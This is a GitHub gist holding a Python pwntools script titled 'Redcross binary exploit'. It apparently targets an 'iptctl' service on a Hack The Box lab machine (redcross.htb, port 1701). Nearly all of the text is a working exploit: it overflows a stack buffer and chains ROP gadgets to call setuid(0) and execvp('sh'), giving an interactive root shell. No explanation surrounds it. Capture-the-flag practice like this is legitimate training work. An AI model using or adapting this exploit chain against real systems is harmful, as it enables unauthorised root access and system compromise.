Skip to content

Instantly share code, notes, and snippets.

@xct

xct/redcross.py Secret

Last active Mar 27, 2019
Embed
What would you like to do?
Redcross binary exploit
#!/usr/bin/python
from pwn import *
from struct import pack
context.terminal = ['alacritty','-e','sh','-c']
pop_rdi_ret = 0x400de3
pop_rsi_pop_ret = 0x400de1
sh = 0x40046e # last 2 chars of fflush string
dummy = 0xcafebabecafebabe # filler
execvp = 0x400760
setuid = 0x400780
rop = ''
rop += p64(pop_rdi_ret)
rop += p64(0)
rop += p64(setuid)
rop += p64(pop_rsi_pop_ret)
rop += p64(0)
rop += p64(dummy)
rop += p64(pop_rdi_ret)
rop += p64(sh)
rop += p64(execvp)
rop += "\n"
buf = ''
buf += "show" + "A" * 22
buf += "B" * 8 # rbp
buf += rop
buf += "100.100.100.100\x00"
#p = process(['./iptctl', '-i'])
p = remote('redcross.htb', 1701)
#gdb.attach(p, '''
# set follow-fork-mode child
# b *0x0000000000400b5d
# c
# ''')
p.sendline(buf)
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment